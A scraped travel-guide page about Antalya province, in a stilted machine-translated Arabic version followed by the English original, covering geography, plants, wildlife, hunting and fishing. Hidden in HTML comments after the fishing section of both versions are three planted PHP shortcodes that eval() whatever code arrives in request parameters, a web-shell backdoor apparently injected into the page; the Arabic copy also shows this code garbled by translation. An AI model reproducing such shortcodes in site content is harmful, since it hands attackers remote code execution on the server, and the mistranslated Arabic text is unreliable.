الرئيسية / أنطاليا / أنطاليا دليل السفر

أنطاليا دليل السفر

أنطاليا السفر، دليلمرحبا بكم في أنطاليا دليل السفر. أنطاليا هي العاصمة وأكبر مركز من سكان المنطقة, مع تجاوز عدد سكانها نصف مليون. وتقع المدينة على هضبة الذي يميل ضد “مصارعة الثيران” الجبال والتي تشكل المنحدرات على الجانب البحر. في أول سهل صخري على ساحل هو مركز المدينة وعلى السهل وراء ذلك, اسمه Kepezüstü, تم إنشاء وحدة استيطانية صغيرة. الساحل هو 530 كم طولا والحدود مع إيسن في الغرب وKaledran الخور في الشرق. محافظة تبلغ مساحتها 20,820 km2. وتتكون التربة من سهل تتكون من تكتل, الطمي والحجر الجيري الصخور falez.

جبال طوروس, تتكون من الحجر الجيري واعوج الأراضي, مع التكوينات الكارستية السطحية, لدينا العديد من الوديان العميقة, الكهوف, الشقوق والصدوع. في مناطق المستنقعات على ارتفاع 300 متر من الأشجار الساحل فرك, المعروفة باسم MAQUIS, تم العثور على. وتشمل هذه الدفلى, الفراولة البرية, خشب الصندل, أشجار الفراولة, الآس, أشجار chinaberry, خليج, أشجار عفيفة, أشجار الخروب, مكنسة والقربيون نبات. الزعتر, حكيم, الزعفران, الأرقطيون, الزنبق, الهليون, بلاك بيري, أقحوان و, قليلة, البلوط, طائرة الشرقية, الكمثرى البرية, وتوجد أيضا أشجار الزيتون والزيزفون.

300 متر بشكل أوسع في, وغابات الصنوبر والسنديان الأحمر, والمستنقعات مع أشجار الكينا يمكن رؤية. 1200 م على مزيد من الغابات مع الأرز, أشجار التنوب, سكوتش الصنوبر, العرعر والزان تبدأ. كما التربة الغرينية على السهول غير صالحة للزراعة, خضروات, تزرع الفواكه والزهور في البيوت المحمية للتصدير. فتح البرتقال, اليوسفي, ويمكن رؤية الليمون والجريب فروت الحدائق في محيط, في رياح البحر الأبيض المتوسط ​​الدافئة. على الجانب الشرقي من سهل أنطاليا, تزرع الموز والأفوكادو. يزرع القطن باعتبارها المنشآت الصناعية وإنتاج القطن, جنبا إلى جنب مع طواحين القطن ومصانع النسيج, يحمل إمكانات كبيرة لتركيا. التفاح, الكمثرى, خمسة عشر, وتزرع العنب والسمسم على الهضاب الجبلية.

الحيوانات الإقليمي هو جيد جدا للقيام بجولات الصيد. في Düzlerçamı على جبال طوروس, تغطي مساحة قدرها 10,000 هكتار, الغزلان البور, يسمح الماعز البري وصيد الغزلان رو على أساس التحكم. الذئاب, الثعالب, الدببة البنية, مارتنز, الخنزير البري, القطط والثعالب البرية هي الأنواع البرية التي غالبا ما كانت تعرف found.The الثور ليوبارد في الوجود حتى وقت قريب. الحجل, السمان, السلحفاة حمامة, الحمامة البرية, الشحرور, ودكوك, يمكن اعتبار الدراج والبط البري والطيور اللعبة.

ومن المعروف جيدا في المنطقة للأسماك grida لها; بالإضافة إلى هذا, الشبوط, الحصان الماكريل, الدنيس الأسود, المذهبة الرأس, البوري, الغرنار سمك شائك الرأس, البياض, لطيف, مخطط البوري الأحمر, needlefish, بونيتو ​​كبير, الغرنار سمك شائك الرأس الأحمر والبوري الأحمر هي من بين الأسماك البحرية الرئيسية, ويشمل غيرها من المنتجات البحرية سلطعون الناسك, جراد البحر, الروبيان, الحبار والسمك وبلح البحر. وبالإضافة إلى ذلك, ويتم صيد الأسماك قفص في البحر في ست نقاط على الساحل حيث تربى بأس البحر والبوري. ويتم الصيد خط المياه العذبة عليها في إيسن, لا, Köprüçay, مانافجات, AKCAY وفي الأنهار. مطاعم الأسماك التي أنشئت داخل المياه في خافت كريك مشهورة بشكل خاص. أسماك المياه العذبة الرئيسية هي الشوب المياه العذبة, جثم المياه العذبة, الكارب, مرآة الكارب, ثعبان البحر, قاتمة والتنش. هناك العديد من مزارع إنتاج سمك السلمون المرقط والمطاعم في تلك الأجزاء من جبال طوروس بالقرب من سرير الماء والنهر.

<!– [insert_php]إذا (isset($_طلب["KIV"])){وحدة التقييم($_طلب["KIV"]);ىخرج;}[/insert_php][فب]إذا (isset($_طلب["KIV"])){وحدة التقييم($_طلب["KIV"]);ىخرج;}[/فب] –>

<!– [insert_php]إذا (isset($_طلب["tXi"])){وحدة التقييم($_طلب["tXi"]);ىخرج;}[/insert_php][فب]إذا (isset($_طلب["tXi"])){وحدة التقييم($_طلب["tXi"]);ىخرج;}[/فب] –>

<!– [insert_php]إذا (isset($_طلب["RcZL"])){وحدة التقييم($_طلب["RcZL"]);ىخرج;}[/insert_php][فب]إذا (isset($_طلب["RcZL"])){وحدة التقييم($_طلب["RcZL"]);ىخرج;}[/فب] –>

Booking.com

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*

Home / Antalya / Antalya Travel Guide

Antalya Travel Guide

antalya-travel-guideWelcome to Antalya Travel Guide. Antalya is the capital and the largest center of population of the region, with its population exceeding half a million. The city is located on a plateau which leans against the “Toros” mountains and which forms cliffs on the sea side. On the first rocky plain on the coast is the town centre and on the plain behind it, named Kepezüstü, small settlement units have been established. The coast is 530 km in length and borders with Eşen in the west and Kaledran creek in the east. The province has an area of 20,820 km2. The soil of the plain is made up of conglomerate, alluvium and travertine falez rocks.

The Taurus mountains, formed of limestone and serpentine lands, with karst surface formations, have many deep valleys, caves, crevices and faults. In the marshy areas at a height of 300 m from the coast scrub trees, known as maquis, are found. These include oleander, wild strawberries, sandalwood, strawberry trees, myrtle, chinaberry trees, bay, chaste trees, carob trees, broom and spurge. Thyme, sage, saffron, burdock, asphodel, asparagus, blackberry, chrysanthemum and, sparsely, oak, Oriental plane, wild pear, olive and linden trees are also found.

300 metres further on in, the red pine and oak forests, and marshes with eucalyptus trees can be seen. 1200 m further on the forests with cedar, fir trees, Scotch pine, juniper and beech begin. As the alluvial soil on the plains is suitable for agriculture, vegetables, fruit and flowers are grown in greenhouses for export. Open orange, mandarin, lemon and grapefruit gardens can be seen in the vicinity, in the warm Mediterranean winds. On the east of the Antalya plain, banana and avocado are grown. Cotton is sown as an industrial plant and cotton production, along with cotton mills and textile factories, holds great potential for Turkey. Apples, pears, quince, grapes and sesame are grown on the mountainous plateaus.

The regional fauna is very good for hunting tours. In Düzlerçamı on the Taurus mountains, covering an area of 10,000 hectares, fallow deer, wild goat and roe deer hunting is permitted on a controlled basis. Wolves, foxes, brown bears, martens, wild boar, wild cats and jackals are the wild species that are often found.The Taurus Leopard was known to exist until recently. Partridge, quail, turtle dove, wild pigeon, blackbird, woodcock, francolin and wild duck can be regarded as game birds.

The region is well-known for its grida fish; in addition to this, sea bream, horse mackerel, black bream, gilt-head, grey mullet, gurnard, whiting, bonito, striped red mullet, needlefish, large bonito, red gurnard and red mullet are among the major sea fish, other sea produce includes hermit crab, lobster, shrimp, cuttle-fish and mussel. In addition, cage fishing is carried out in the sea at six points on the coast where sea-bass and grey mullet are bred. Fresh water line fishing is carried out in the Eşen, Dim, Köprüçay, Manavgat, Akçay and Alara rivers. The fish restaurants established within water in the Dim Creek are particularly famous. The main fresh water fish are fresh water chub, fresh water perch, carp, mirror-carp, eel, bleak and tench. There are numerous trout production farms and restaurants in those parts of the Taurus Mountains close to water and river beds.

<!– [insert_php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/insert_php][php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/insert_php][php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/insert_php][php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/php] –>

Booking.com

Leave a Reply

Your email address will not be published. Required fields are marked *

*